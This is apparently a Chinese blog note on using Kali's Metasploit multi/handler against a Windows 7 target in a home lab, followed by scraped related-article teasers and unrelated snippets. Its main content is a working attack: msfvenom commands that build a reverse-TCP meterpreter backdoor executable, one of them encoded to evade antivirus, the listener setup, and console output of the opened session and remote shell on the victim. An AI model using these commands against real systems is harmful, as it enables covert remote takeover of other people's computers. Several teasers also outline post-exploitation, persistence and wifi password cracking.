环境
  1. 靶机 192.168.137.133
  2. kali 192.168.137.135

步骤+

生成后门
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe
  1. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.137.135 lport=4433 -f exe > payload.exe

使用/multi/handler模块
  1. root@kali:~# msfconsole
  2.  
  3. . .
  4. .
  5.  
  6. dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
  7. ' dB' BBP
  8. dB'dB'dB' dBBP dBP dBP BB
  9. dB'dB'dB' dBP dBP dBP BB
  10. dB'dB'dB' dBBBBP dBP dBBBBBBB
  11.  
  12. dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
  13. . . dB' dBP dB'.BP
  14. | dBP dBBBB' dBP dB'.BP dBP dBP
  15. --o-- dBP dBP dBP dB'.BP dBP dBP
  16. | dBBBBP dBP dBBBBP dBBBBP dBP dBP
  17.  
  18. .
  19. .
  20. o To boldly go where no
  21. shell has gone before
  22.  
  23. =[ metasploit v4.16.30-dev ]
  24. + -- --=[ 1722 exploits - 986 auxiliary - 300 post ]
  25. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  26. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  27.  
  28. msf > use exploit/multi/handler
设置本地ip与端口
  1. msf exploit(multi/handler) > set lhost 192.168.137.135
  2. lhost => 192.168.137.135
  3. msf exploit(multi/handler) > set lport 50000
  4. lport => 50000
启动后门攻击监听
  1. msf exploit(multi/handler) > exploit -z -j

情况+

当靶机点击后门程序openme.exe后,kali监听到session, 进行拿权

  1. msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.137.139
  2. [*] Meterpreter session 1 opened (192.168.137.135:50000 -> 192.168.137.139:49159) at 2018-04-13 22:18:04 +0800
  3. sessions
  4.  
  5. Active sessions
  6. ===============
  7.  
  8. Id Name Type Information Connection
  9. -- ---- ---- ----------- ----------
  10. 1 meterpreter x86/windows chenglee-PC\chenglee @ CHENGLEE-PC 192.168.137.135:50000 -> 192.168.137.139:49159 (192.168.137.139)
  11.  
  12. msf exploit(multi/handler) > sessions -i 1
  13. [*] Starting interaction with 1...
控制靶机shell
  1. meterpreter > shell
  2. Process 3028 created.
  3. Channel 1 created.
  4. Microsoft Windows [�汾 6.1.7601]
  5. ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
  6.  
  7. C:\Users\chenglee\Desktop>ls

演示

kali

靶机

好东西做个分享

D7经典脚本[multi/handler]

做个笔记。

Kali系列之multi/handler(渗透win7)的更多相关文章

  1. kail linux 系统下利用metaspolit工具渗透win7电脑

     注:只是测试,不可干违法的事. 一.metaspolit工具的介绍 1.1.metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇 ...

  2. kali linux之msf后渗透阶段

    已经获得目标操作系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有session扩大战果 绕过UAC限制 use exploit/windows/local/ask set sessi ...

  3. kali linux之msf客户端渗透

    在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行p ...

  4. Kali-利用metasploit中的exploit/multi/handler进行攻击

    在攻击服务器上生成连接软件,LHOST为攻击机IP地址 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=4 ...

  5. kali linux 2.0 web 渗透测试 电子书

    原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书 ...

  6. Web渗透测试使用Kali Linux(一)渗透测试概要及环境部署

    渗透测试是利用已经发现的漏洞,采用恶意黑客的惯用手段来尝试对漏洞进行攻击. Kali Linux是BackTrack的进化版,是Linux的衍生版本,专门开发用作渗透测试,其中提供了很多的渗透测试工具 ...

  7. Kali系列之aircrack-ng wifi密码穷举

    kali linux安全渗透 网卡:rtl8187 工具aircrack-ng 操作+ 查看无线网卡信息 ifconfig 或者 iwconfig 有个是wlan0的就是您的外置无线网卡 启动网卡监听 ...

  8. 内网横向渗透 之 ATT&CK系列一 之 横向渗透域主机

    前言 上一篇文章中已获取了关于域的一些基本信息,在这里再整理一下,不知道信息收集的小伙伴可以看回上一篇文章哦 域:god.org 域控 windows server 2008:OWA,192.168. ...

  9. Handler详解系列(四)——利用Handler在主线程与子线程之间互发消息,handler详解

    MainActivity如下: package cc.c; import android.app.Activity; import android.os.Bundle; import android. ...

随机推荐

  1. MSSqlServer 发布/订阅配置(主从同步)

    背景: 1.单个独立数据库的吞吐量是有瓶颈的,那么如何解决这个瓶颈? 2.服务器直接数据如何复制.并具备一致性.可扩展性? 资源: 官方资源:https://technet.microsoft.com ...

  2. iOS 新浪微博-5.1 首页微博列表_时间/配图

    在上一篇中,我们已经把首页微博显示出来了,但还有很多细节,需要我们去调整的.这一章中,我们将处理好时间,配图,工具框及转发微博等小细节的功能. 时间处理 第一步:定义一个时间的类别,用于判断是昨天.今 ...

  3. 从零开始一起学习SLAM | 你好,点云

    本文提纲 先热热身点云是啥你知道点云优缺点吗?点云库PCL:开发者的福音PCL安装指北炒鸡简单的PCL实践留个作业再走先热热身 小白:hi,师兄,好久不见师兄:师妹好,上周单应矩阵作业做了吗?小白:嗯 ...

  4. keras图像分类参考大神博客总结

    利用keras预加载模型添加新的层来构建自己所需的模型: from keras.layers import GlobalAveragePooling2D,Dense from keras.applic ...

  5. hadoop管理

    hadoop管理工具: 一,dfsadmin工具 dfsadmin 工具用途比较广,既可以查找HDFS状态信息,又可以在HDFS上执行管理操作,以hdfs dfsadmin形式调用,且需要超级用户权限 ...

  6. laravel使用过程总结

    docker-compose exec -T workspace php artisan route:list  //查看路由 laravel数据存入session,会出现Session store ...

  7. RDD、DataFrame、Dataset三者三者之间转换

    转化: RDD.DataFrame.Dataset三者有许多共性,有各自适用的场景常常需要在三者之间转换 DataFrame/Dataset转RDD: 这个转换很简单 val rdd1=testDF. ...

  8. gispro发布vectortile笔记

    1.https://www.cnblogs.com/escage/p/6387529.html 矢量切片的作用.对于地图中的基础数据图层,或者数据量比较大的矢量图层,只是作渲染用.则需要制作矢量切片, ...

  9. https加密过程

    https加密完整过程 step1: “客户”向服务端发送一个通信请求 “客户”->“服务器”:你好 step2: “服务器”向客户发送自己的数字证书.证书中有一个公钥用来加密信息,私钥由“服务 ...

  10. Marlin 溫度 sensor 校正

    Marlin 溫度 sensor 校正 使用 Type-K 溫度計 將探針綑綁在加熱頭側面 開啟Marlin-Marlin_v1\Marlin\thermistortables.h 要修改的溫度對應表 ...